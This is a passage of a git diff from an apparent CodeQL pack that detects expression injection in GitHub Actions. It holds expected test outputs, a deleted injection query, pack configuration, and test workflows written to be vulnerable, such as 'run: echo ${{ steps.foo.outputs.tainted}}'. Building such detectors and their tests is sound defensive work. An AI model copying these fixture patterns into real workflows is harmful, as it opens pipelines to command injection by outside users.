${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | -| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | -| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | -| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | -| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | -nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | semmle.label | uses: . ... low.yml [workflow-output1] | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | semmle.label | uses: . ... low.yml [workflow-output2] | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | semmle.label | ${{ git ... .ref }} | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | semmle.label | uses: o ... .yml@v1 [workflow-output] | -| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | semmle.label | ${{ git ... .ref }} | -| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | semmle.label | uses: o ... .yml@v1 | -| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | semmle.label | echo ${ ... put1 }} | -| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | semmle.label | echo ${ ... put2 }} | -| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | -| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | semmle.label | output workflow-output1: [workflow-output1] | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | semmle.label | output workflow-output1: [workflow-output2] | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... utput}} [job-output2] | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| composite-actions/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | -| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] | -| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | -| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | -| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | -subpaths -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | -#select -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential injection from the ${{ steps.remove_quotations.outputs.replaced }}, which may be controlled by an external user. | -| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output1 }}, which may be controlled by an external user. | -| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output2 }}, which may be controlled by an external user. | -| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | Potential injection from the ${{ needs.call3.outputs.workflow-output }}, which may be controlled by an external user. | -| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | Potential injection from the ${{ needs.call4.outputs.workflow-output }}, which may be controlled by an external user. | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential injection from the ${{ steps.changed-files.outputs.all_changed_files }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential injection from the ${{ env.ISSUE_BODY_PARSED }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.auto_branch }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.destination_branch }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.pr_message }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.user_name }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ github.event.after }}, which may be controlled by an external user. | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential injection from the ${{ steps.trim-url.outputs.trimmed_url }}, which may be controlled by an external user. | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | -| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential injection from the ${{ matrix.language }}, which may be controlled by an external user. | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Potential injection from the ${{ inputs.config-path }}, which may be controlled by an external user. | -| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential injection from the ${{ steps.summary.outputs.value }}, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential injection from the ${{ steps.step.outputs.value }}, which may be controlled by an external user. | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | -| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | Potential injection from the ${{ steps.replace.outputs.value }}, which may be controlled by an external user. | -| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | Potential injection from the ${{ inputs.who-to-greet }}, which may be controlled by an external user. | diff --git a/ql/src/test/test.ql b/ql/src/test/test.ql deleted file mode 100644 index f8d6e0c804b6..000000000000 --- a/ql/src/test/test.ql +++ /dev/null @@ -1,37 +0,0 @@ -/** - * @name Expression injection in Actions - * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious - * user to inject code into the GitHub action. - * @kind path-problem - * @problem.severity warning - * @security-severity 9.3 - * @precision high - * @id actions/command-injection - * @tags actions - * security - * external/cwe/cwe-094 - */ - -import actions -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources - -private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) -select sink.getNode(), source, sink, - "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() + - " }}, which may be controlled by an external user." diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml new file mode 100644 index 000000000000..8494dea432f7 --- /dev/null +++ b/ql/test/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.8 + codeql/dataflow: + version: 0.1.8 + codeql/ssa: + version: 0.2.8 + codeql/typetracking: + version: 0.2.8 + codeql/util: + version: 0.2.8 + codeql/yaml: + version: 0.2.9 +compiled: false diff --git a/ql/lib/test/.github/workflows/test.yml b/ql/test/library-tests/.github/workflows/test.yml similarity index 100% rename from ql/lib/test/.github/workflows/test.yml rename to ql/test/library-tests/.github/workflows/test.yml diff --git a/ql/lib/test/test.expected b/ql/test/library-tests/test.expected similarity index 100% rename from ql/lib/test/test.expected rename to ql/test/library-tests/test.expected diff --git a/ql/lib/test/test.ql b/ql/test/library-tests/test.ql similarity index 100% rename from ql/lib/test/test.ql rename to ql/test/library-tests/test.ql diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml new file mode 100644 index 000000000000..d85fc698394d --- /dev/null +++ b/ql/test/qlpack.yml @@ -0,0 +1,12 @@ +--- +name: githubsecuritylab/actions-tests +groups: + - actions + - test +dependencies: + githubsecuritylab/actions-all: ${workspace} + githubsecuritylab/actions-queries: ${workspace} +extractor: yaml +tests: . +warnOnImplicitThis: true + diff --git a/ql/src/test/.github/workflows/calling_composite.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml similarity index 99% rename from ql/src/test/.github/workflows/calling_composite.yml rename to ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml index 79c2d072ef56..cc3f3c2863cb 100644 --- a/ql/src/test/.github/workflows/calling_composite.yml +++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml @@ -12,3 +12,4 @@ jobs: who-to-greet: ${{ github.event.pull_request.head.ref }} - run: echo ${{ steps.foo.outputs.reflected}} - run: echo ${{ steps.foo.outputs.tainted}} + diff --git a/ql/src/test/.github/workflows/calling_workflow.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml similarity index 99% rename from ql/src/test/.github/workflows/calling_workflow.yml rename to ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml index 7c2bfdf0348f..239ea7ab3878 100644 --- a/ql/src/test/.github/workflows/calling_workflow.yml +++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml @@ -44,3 +44,4 @@ jobs: needs: call4 steps: - run: echo ${{ needs.call4.outputs.workflow-output }} + diff --git a/ql/src/test/.github/workflows/reusable_workflow.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml similarity index 99% rename from ql/src/test/.github/workflows/reusable_workflow.yml rename to ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml index 45c177edecb6..0ca7ecdfbde3 100644 --- a/ql/src/test/.github/workflows/reusable_workflow.yml +++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml @@ -31,3 +31,4 @@ jobs: - name: Get changed files id: step2 uses: tj-actions/changed-files@v40 + diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected new file mode 100644 index 000000000000..d31268b12b59 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected @@ -0,0 +1,15 @@ +edges +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | +| action1/action.yml:24:7:31:4 | name: Remove foo [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | +| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | name: Remove foo [value] | +nodes +| action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | +| action1/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] | +| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | +| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | +| action1/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | +subpaths +#select +| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | Sink | +| action1/action.yml:35:12:35:51 | echo "H ... et }}." | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | Sink | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref new file mode 100644 index 000000000000..f8e1bfca630d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref @@ -0,0 +1 @@ +Security/CWE-020/CompositeActionsSinks.ql diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected new file mode 100644 index 000000000000..23369932e819 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected @@ -0,0 +1,12 @@ +edges +| action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | +| action1/action.yml:44:7:48:70 | id: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | +| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | id: source [tainted] | +nodes +| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | semmle.label | ${{ ste ... inted}} | +| action1/action.yml:42:7:44:4 | id: changed-files | semmle.label | id: changed-files | +| action1/action.yml:44:7:48:70 | id: source [tainted] | semmle.label | id: source [tainted] | +| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +subpaths +#select +| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref new file mode 100644 index 000000000000..dce31c319238 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref @@ -0,0 +1,2 @@ +Security/CWE-020/CompositeActionsSources.ql + diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected new file mode 100644 index 000000000000..8ec7f44dba3d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected @@ -0,0 +1,12 @@ +edges +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | +| action1/action.yml:37:7:42:4 | id: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | +| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | id: reflector [reflected] | +nodes +| action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | +| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | semmle.label | ${{ ste ... cted }} | +| action1/action.yml:37:7:42:4 | id: reflector [reflected] | semmle.label | id: reflector [reflected] | +| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | +subpaths +#select +| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | Summary | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref new file mode 100644 index 000000000000..007941cd2f5b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref @@ -0,0 +1,2 @@ +Security/CWE-020/CompositeActionsSummaries.ql + diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected new file mode 100644 index 000000000000..c9e26d368df7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -0,0 +1,8 @@ +edges +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | +nodes +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| | +subpaths +#select +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Sink | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref new file mode 100644 index 000000000000..369befbce628 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref @@ -0,0 +1,2 @@ +Security/CWE-020/ReusableWorkflowsSinks.ql + diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected new file mode 100644 index 000000000000..8e19cd469ab9 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected @@ -0,0 +1,12 @@ +edges +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | +nodes +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files | +subpaths +#select +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | Source | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref new file mode 100644 index 000000000000..cbea721ee343 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref @@ -0,0 +1,2 @@ +Security/CWE-020/ReusableWorkflowsSources.ql + diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected new file mode 100644 index 000000000000..f7d715c9fa1a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected @@ -0,0 +1,16 @@ +edges +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | +nodes +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ 